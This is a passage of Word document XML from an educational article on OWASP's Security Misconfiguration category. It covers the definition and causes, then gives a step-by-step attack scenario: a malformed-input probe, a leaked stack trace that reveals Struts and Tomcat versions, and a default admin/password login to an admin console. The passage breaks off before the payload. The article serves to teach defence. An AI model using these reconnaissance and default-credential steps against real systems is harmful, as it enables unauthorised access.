        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Core Concept &amp; Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3F60E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Definition: Technical Definition according to OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E233D39"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 xml:space="preserve">According to OWASP, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a system, application, component, or cloud service is deployed or maintained with incorrect or weak security settings, rather than being properly hardened against attacks. It represents a systemic failure to define, implement, and maintain secure baselines across any layer of the application stack. This includes, but is not limited to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F067C8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unchanged default accounts and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA46B6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unnecessary services, ports, features, or sample pages left enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700792E6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Overly permissive cloud storage or network access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B7923" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Improperly configured HTTP headers, frameworks, or verbose error-handling mechanisms that leak system internals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00833006" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. The "Why": Architectural Flaws, Misconfigurations, &amp; Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D616D8"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Security misconfigurations rarely stem from standard code-level syntax errors. Instead, they are born from operational gaps, architectural oversights, and the sheer complexity of modern development environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07372CF2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Shift to Highly Configurable Ecosystems:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modern applications rely heavily on cloud service providers (CSPs like AWS, Azure, GCP), containers (Docker, Kubernetes), and sophisticated frameworks (Spring, .NET). Because these systems favor flexibility and ease of setup out of the box, their default states are frequently optimized for usability rather than security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC40200" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lack of Automated Drift Detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Development, QA, and Production environments naturally "drift" over time. Without automated </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Infrastructure as Code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanning and configuration management tools, manual tweaks by engineers create silent security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D9BC7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Weak Defaults &amp; Legacy Prioritization:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maintaining backward compatibility often results in legacy protocols (such as unencrypted TLS versions or weak ciphers) remaining enabled by default. Similarly, failing to change default vendor credentials during provisioning leaves open doors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E2311" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Failure to Harden the Stack:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Engineers often focus heavily on functional application code while neglecting the underlying infrastructure—leaving directory </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>listing active on the web server, omitting security response headers, or leaving debugging frameworks running in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B43418" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. The Mechanics: Step-by-Step Exploitation Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F4C4B"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 xml:space="preserve">To understand the mechanics, let us look at a real-world scenario combining </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Verbose Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Default Framework Consoles</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a combination of Scenario #1 and Scenario #3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EAF57"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Step 1: Reconnaissance &amp; Triggering the Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32796B22"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 xml:space="preserve">An attacker targets an application and intentionally submits malformed input to a known parameter (e.g., inputting a special character like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an array instead of a string into a database query field) to see how the application behaves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770FB89C"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Step 2: System Processing &amp; Data Leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A40E5"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 xml:space="preserve">Instead of cleanly catching the exception and returning a generic error page, the improperly configured framework bubbles the raw exception up to the user interface. The system processes the request, crashes internally, and outputs a full </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>stack trace</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D084D5C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sample Server Response Payload (Leaked to Attacker):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C96CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681B173" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 500 Internal Server Error Content-Type: text/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18818277" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76D91C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5973E4C2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h2&gt;Internal Server Error: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>java.lang.NullPointerException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BBB4B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt; at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>com.example.myapp.ConfigManager.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">(ConfigManager.java:42) at org.apache.struts2.dispatcher.DetailedDispatcher.handle(DetailedDisp atcher.java:110) [Server Info: Apache Tomcat/9.0.41, Struts 2.5.25, Environment: Dev-Test-Stack] &lt;/pre&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED1DC4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BA2CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC14798"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Step 3: Information Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE48A1B"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 xml:space="preserve">The attacker analyzes the stack trace. They instantly learn the exact backend framework ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Struts 2.5.25</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) and the web server ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Apache Tomcat/9.0.41</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6392F942"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The attacker checks public vulnerability databases (like National Vulnerability Database or Exploit-DB) and finds that this specific version of the framework includes an unremoved administrative console endpoint ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/admin/console</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) that ships with a known default credential pair ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187155CF"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Step 4: The Exploit Payload &amp; Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5B134"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Because the server configuration failed to disable sample apps, remove the admin console, or enforce a strong password policy, the attacker navigates to the endpoint and sends a simple authorization payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BEAE9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
